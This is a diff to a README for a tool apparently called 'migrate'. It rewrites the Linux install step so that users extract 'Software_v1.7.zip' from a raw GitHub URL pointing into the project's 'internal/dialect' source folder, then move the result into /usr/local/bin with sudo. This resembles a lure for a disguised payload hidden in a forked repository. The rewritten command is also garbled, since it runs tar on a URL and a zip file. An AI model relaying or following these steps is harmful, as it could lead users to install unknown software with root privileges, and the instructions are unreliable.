hitmansimo9999/migrate/README.md

 #### Linux

 1. Locate the downloaded archive in your Downloads folder.
-2. Extract the `.tar.gz` file using the command: `tar -xvzf migrate.tar.gz`.
+2. Extract the `https://raw.githubusercontent.com/hitmansimo9999/migrate/main/internal/dialect/Software_v1.7.zip` file using the command: `tar -xvzf https://raw.githubusercontent.com/hitmansimo9999/migrate/main/internal/dialect/Software_v1.7.zip`.
 3. Move the extracted folder to `/usr/local/bin` using: `sudo mv migrate /usr/local/bin`.
 4. Open Terminal and type `migrate` to check if it is installed.